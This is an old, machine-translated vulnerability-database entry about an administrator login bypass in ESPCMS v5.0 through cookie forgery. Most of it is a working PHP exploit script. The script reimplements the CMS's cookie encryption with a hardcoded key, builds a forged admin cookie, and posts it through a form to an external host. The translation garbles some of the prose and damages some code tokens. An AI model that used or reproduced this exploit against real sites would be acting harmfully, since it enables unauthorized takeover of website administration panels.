ESPCMS v5. 0 to bypass the administrator login EXP-vulnerability warning-the black bar safety net

2011-04-27T00:00:00
ID MYHACK58:62201130215
Type myhack58
Reporter 佚名
Modified 2011-04-27T00:00:00

Description

Publishing author: sub-meter

Vulnerability type: cookies cheat

Vulnerability analysis: the background of the page there is cookie authentication vulnerability can be deceiving into the background.

EXP:

<? function eccode($string, $operation='DECODE', $key='@LFK24s224%@safS3s%1f%') { $result = "; if ($operation == 'ENCODE') { for ($i = 0; $i < strlen($string); $i++) { $char = substr($string, $i, 1); $keychar = substr($key, ($i % strlen($key)) - 1, 1); $char = chr(ord($char) + ord($keychar)); $result.=$ char; } $result = base64_encode($result); $result = str_replace(array('+', '/', '='), array('-', '', "), $result); } elseif ($operation == 'DECODE') { $data = str_replace(array('-', ''), array('+', '/'), $string); $mod4 = strlen($data) % 4; if ($mod4) { $data .= substr ('====', $mod4); } $string = base64_decode($data); for ($i = 0; $i < strlen($string); $i++) { $char = substr($string, $i, 1); $keychar = substr($key, ($i % strlen($key)) - 1, 1); $char = chr(ord($char) - ord($keychar)); $result.=$ char; } } return $result; } define('admin_AGENT', $_SERVER['HTTP_USER_AGENT']); $name=$_POST[name]; $s=md5(admin_AGENT); $ecisp_admininfo='1|admin|e00cf25ad42683b3df678c61f42c6bda|'.$ s.' |1|1|'. md5("http://".$ name."/ adminsoft"); $a= eccode($ecisp_admininfo, 'ENCODE'); echo "ecisp_admininfo=".$ a."; esp_powerlist=hqy4;"."& lt;br><br><br>"; ?& gt; <form method="post" action="http://www.zyday.com/exp/espcmsv50.php" enctype="multipart/form-data" id="upload"> <label> <input name="name" type="text" value="www.zyday.com" /> </label> <div></div> <input name="respondids" value="give me COOKIES" type="submit"> </form> http://www.zyday.com/exp/espcmsv50.php as the document address, Please modify